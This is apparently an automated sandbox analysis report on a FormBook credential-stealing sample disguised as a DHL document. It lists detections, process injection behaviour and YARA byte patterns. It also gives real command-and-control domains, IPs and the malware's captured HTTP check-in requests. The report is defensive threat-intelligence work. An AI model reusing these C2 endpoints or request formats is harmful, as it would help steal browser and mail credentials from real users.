Edit tour

Windows Analysis Report
DHL-DOC83972025-1.exe

Overview

General Information

Sample name:	DHL-DOC83972025-1.exe
Analysis ID:	1586545
MD5:	7e709c914c89cd047067dfdae9f83195
SHA1:	00cec0a619ed36ba2824b3aac06d71ca59003b95
SHA256:	ee47f75a94b6f25b076969a64bfca3004babe7f00faad7da76ef683bbf0f6b39
Tags:	DHLexeFormbookuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL-DOC83972025-1.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe" MD5: 7E709C914C89CD047067DFDAE9F83195)

svchost.exe (PID: 1452 cmdline: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

CKQtyFoaVDYewUznZxosidSwbd.exe (PID: 1708 cmdline: "C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 7296 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

CKQtyFoaVDYewUznZxosidSwbd.exe (PID: 5200 cmdline: "C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x91caa7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x906146:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f044:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x186e3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x91caa7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x906146:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.3b0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.3b0000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.3b0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.3b0000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", CommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", ParentImage: C:\Users\user\Desktop\DHL-DOC83972025-1.exe, ParentProcessId: 6588, ParentProcessName: DHL-DOC83972025-1.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", ProcessId: 1452, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", CommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", ParentImage: C:\Users\user\Desktop\DHL-DOC83972025-1.exe, ParentProcessId: 6588, ParentProcessName: DHL-DOC83972025-1.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL-DOC83972025-1.exe", ProcessId: 1452, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T09:41:41.876273+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61204	154.215.72.110	80	TCP
2025-01-09T09:42:13.833137+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61292	116.50.37.244	80	TCP
2025-01-09T09:43:35.511136+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61296	85.159.66.93	80	TCP
2025-01-09T09:43:48.877195+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61300	91.195.240.94	80	TCP
2025-01-09T09:44:10.472792+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61304	66.29.149.46	80	TCP
2025-01-09T09:44:23.862634+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61308	195.110.124.133	80	TCP
2025-01-09T09:44:53.483406+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	61312	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL-DOC83972025-1.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?tjVTF=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh&2na=ihrTFVnP9VKx	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?tjVTF=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG&2na=ihrTFVnP9VKx	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?tjVTF=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&2na=ihrTFVnP9VKx	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: DHL-DOC83972025-1.exe	ReversingLabs: Detection: 47%
Source: DHL-DOC83972025-1.exe	Virustotal: Detection: 33%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL-DOC83972025-1.exe

Joe Sandbox ML: detected

Source: DHL-DOC83972025-1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326537881.0000000000F6E000.00000002.00000001.01000000.00000005.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000000.1470349122.0000000000F6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL-DOC83972025-1.exe, 00000000.00000003.1259376214.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, DHL-DOC83972025-1.exe, 00000000.00000003.1256891997.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1311661371.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313458028.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.0000000003000000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.0000000003140000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.00000000032DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1405176175.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1403036801.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL-DOC83972025-1.exe, 00000000.00000003.1259376214.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, DHL-DOC83972025-1.exe, 00000000.00000003.1256891997.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1311661371.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313458028.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402895446.0000000003000000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3724603113.0000000003140000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3724603113.00000000032DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1405176175.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1403036801.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1371717132.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402794512.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000003.1342791960.000000000136B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3725601307.000000000376C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000287C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1791268128.0000000029D7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3725601307.000000000376C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3718390365.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000287C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1791268128.0000000029D7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1371717132.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1402794512.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000003.1342791960.000000000136B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0042C2A2 FindFirstFileExW,	0_2_0042C2A2
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004668EE FindFirstFileW,FindClose,	0_2_004668EE
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0046698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0046698F
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0045D076
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0045D3A9
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00469642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00469642
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0046979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046979D
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00469B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00469B2B
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0045DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0045DBBE
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00465C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00465C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0276BAB0 FindFirstFileW,FindNextFileW,FindClose,	10_2_0276BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	10_2_02759480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	10_2_0275DD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	10_2_02F7053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61204 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61300 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61296 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61304 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61292 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61312 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:61308 -> 195.110.124.133:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0046CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0046CE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5havgW/E7FBnRHSVLxLOmP4JSsfFuCtKITU5HHIETNdwZpVM5nJMc2sOIT&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
